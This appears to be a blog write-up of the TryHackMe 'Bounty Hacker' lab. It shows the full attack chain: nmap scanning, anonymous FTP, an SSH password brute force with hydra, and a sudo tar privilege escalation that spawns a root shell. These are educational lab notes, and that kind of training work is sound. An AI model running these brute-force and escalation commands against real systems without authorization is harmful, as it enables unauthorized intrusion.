Bounty Hacker — TryHackMe WriteUp
Greetings, fellow readers and aspiring cyber adventurers,
In the ever-expanding galaxy of cybersecurity challenges, there’s a room on TryHackMe that beckons those who dare to claim the title of the elite — “Bounty Hacker.” This article takes you on a journey through this thrilling room where we’ll explore the challenges, exploits, and triumphs that stand between us and the coveted status of an Elite Bounty Hacker. So, fasten your digital seatbelts as we embark on a cosmic quest to prove our mettle in the cyber realm!
You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they’d take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!
Started with an Nmap scan. Found 3 open ports
└─$ nmap --min-rate 1000 10.10.25.54
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-06 20:18 EAT
Nmap scan report for 10.10.25.54
Host is up (0.28s latency).
Not shown: 967 filtered tcp ports (no-response), 30 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open httpRan a service scan
└─$ nmap -p21,22,80 -A 10.10.25.54
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-06 20:19 EAT
Nmap scan report for 10.10.25.54
Host is up (0.28s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.18.6.139
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelEnumeration
FTP (Port 21)
Anonymous login was successful, I had challenges because it was entering extended passive mode. There were 2 files (locks.txt, task.txt). I downloaded them to my local machine
└─$ ftp 10.10.25.54
Connected to 10.10.25.54.
220 (vsFTPd 3.0.3)
Name (10.10.25.54:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||27489|)
^C
receive aborted. Waiting for remote to finish abort.
ftp> dir
229 Entering Extended Passive Mode (|||25346|)
^C
receive aborted. Waiting for remote to finish abort.
ftp> binary
200 Switching to Binary mode.
ftp> ls -lah
229 Entering Extended Passive Mode (|||13350|)
ftp: Can't connect to `10.10.25.54:13350': Connection timed out
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jun 07 2020 .
drwxr-xr-x 2 ftp ftp 4096 Jun 07 2020 ..
-rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt
-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt
226 Directory send OK.
ftp>ftp> mget locks.txt task.txt
mget locks.txt [anpqy?]? y
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
100% |***********************************************************************| 418 8.54 KiB/s 00:00 ETA
226 Transfer complete.
418 bytes received in 00:00 (1.22 KiB/s)
mget task.txt [anpqy?]? y
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
100% |***********************************************************************| 68 303.22 KiB/s 00:00 ETA
226 Transfer complete.
68 bytes received in 00:00 (0.23 KiB/s)
ftp>On viewing the contents of the files;
locks.txt — seemed like a list of passwords
─$ cat locks.txt
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7etask.txt — A note from a user
─$ cat task.txt
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-linSSH (Port 22)
There was a user name lin so I bruteforced for the password using hydra and locks.txt was my password list and found a password
└─$ hydra -l lin -P locks.txt 10.10.25.54 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-06 20:33:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.25.54:22/
[22][ssh] host: 10.10.25.54 login: lin password: {REDACTED}
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-06 20:33:24I SSHed to the machine with the found credentials and was successful. I then looked for the user.txt and found our first flag
└─$ ssh lin@10.10.25.54
The authenticity of host '10.10.25.54 (10.10.25.54)' can't be established.
ED25519 key fingerprint is SHA256:Y140oz+ukdhfyG8/c5KvqKdvm+Kl+gLSvokSys7SgPU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.25.54' (ED25519) to the list of known hosts.
lin@10.10.25.54's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
83 packages can be updated.
0 updates are security updates.
Last login: Sun Jun 7 22:23:41 2020 from 192.168.0.14
lin@bountyhacker:~/Desktop$ ls
user.txt
lin@bountyhacker:~/Desktop$ cat user.txt
THM{REDACTED}
lin@bountyhacker:~/Desktop$I need to escalate privileges to be the root user. User lin could only run /bin/tar as sudo
lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin:
Matching Defaults entries for lin on bountyhacker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User lin may run the following commands on bountyhacker:
(root) /bin/tarI used GTFOBins and search for tar https://gtfobins.github.io/gtfobins/tar/
I directly ran this command and got root and the root flag as our second flag
lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# whoami
root
# pwd
/home/lin/Desktop
# cd /root
# ls
root.txt
# cat root.txt
THM{REDACTED}
#About the author
Wilklins Nyatteng is a cyber security enthusiast with interest in penetration testing & vulnerability assessments, OSINT, cloud security. Certified Cyber Security professional by Trend Micro, 9x Microsoft Certified, CEH Master and AWS Solutions Architect — Associate.
Follow me on:
